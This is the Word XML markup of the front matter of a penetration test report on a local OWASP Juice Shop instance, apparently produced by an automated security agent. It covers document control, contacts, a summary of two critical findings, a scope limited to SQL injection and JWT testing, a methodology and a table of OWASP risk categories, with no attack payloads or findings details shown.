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 Application Penetration Test Report — v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target System: OWASP Juice Shop v19.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Author"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performed by the OpenHack Security Agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Issued by Jane Doe (jane.doe@openhack.sec)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Date"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2026-02-23</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Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to conduct Web application security test - Focused vulnerability assessment targeting SQL Injection and JWT security flaws IT security investigation. The subject of the investigation was the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“OWASP Juice Shop v19.1.1”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The test was performed using Local development environment at http://localhost:3333.</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9" w:name="document-control"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Document Status</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2718"/>
        <w:gridCol w:w="5201"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Assessment Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Document Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OpenHack Security Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Strictly Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Project Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Version History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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Draft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026-02-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Final document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">–</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Persons - Assessor</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Jane Doe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lead Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 123 4567</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">jane.doe@openhack.sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">John Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 234 5678</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">john.smith@openhack.sec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contact Persons - Client</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Bjoern Kimminich</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Project Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">+1 555 345 6789</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">bjoern.kimminich@owasp.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10"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“ASSESSOR”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) has been commissioned by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bjoern Kimminich</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(hereinafter referred to as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“CLIENT”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) to carry out a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The penetration test of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Juice Shop v19.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">application took place on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2026-02-23</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this purpose, the web application, accessible at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3333</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, was tested from the perspective of an external attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As part of the test, a total of 2 vulnerabilities were identified: 2 critical, 0 high, 0 medium, 0 low, and 0 informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Critical:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| High:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| Medium:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0</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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Overview of Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="3889"/>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pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</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r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">2</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10"/>
    <w:bookmarkStart w:id="15" w:name="X55a090500ae0830f4c87de9d9be2e793ad55880"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Execution of the Security Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="11" w:name="subject-under-test"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subject Under Test</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="scope"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scope for the assessment was the following targets:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Target:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">http://localhost:3333</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. SQL Injection Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Login forms and authentication endpoints</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Search functionality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- URL parameters and query strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- API endpoints accepting user input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication token generation and validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Token signature verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Algorithm confusion attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Token expiration and refresh mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Out of Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Denial of Service attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Physical security testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Social engineering attacks</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="methodology"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The security penetration test of the OWASP Juice Shop v19.1.1 took place on 2026-02-23.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide v4.2 with focus on:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Injection flaws (A03:2021 – Injection)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Cryptographic failures in JWT implementations (A02:2021 – Cryptographic Failures)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Broken authentication mechanisms (A07:2021 – Identification and Authentication Failures)</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tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2130"/>
        <w:gridCol w:w="5789"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Users can act outside their permissions, leading to unauthorized viewing, modification, or deletion of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Systems or cloud services are insecurely configured, e.g., through default passwords or unnecessarily enabled features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software Supply Chain Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vulnerabilities arise from compromised third-party code, libraries, or build pipelines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sensitive data is exposed through missing, weak, or incorrectly implemented encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attackers inject malicious commands (e.g., SQL or shell code) through input fields that the system erroneously executes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fundamental architectural flaws that exist before implementation make an application inherently insecure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Flaws in identity verification allow attackers to take over sessions or guess passwords (brute force).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Software or Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lack of verification of code or data sources leads to acceptance of untrusted updates or serialization data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Security Logging &amp; Alerting Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attacks go undetected or responses are delayed due to missing logs or absent alert notifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Programs respond inadequately to unforeseen situations, which can lead to crashes or logic errors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkStart w:id="14"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14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:bookmarkStart w:id="20" w:name="risk-assessment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risk Assessment</w:t>
      </w:r>
    </w:p>
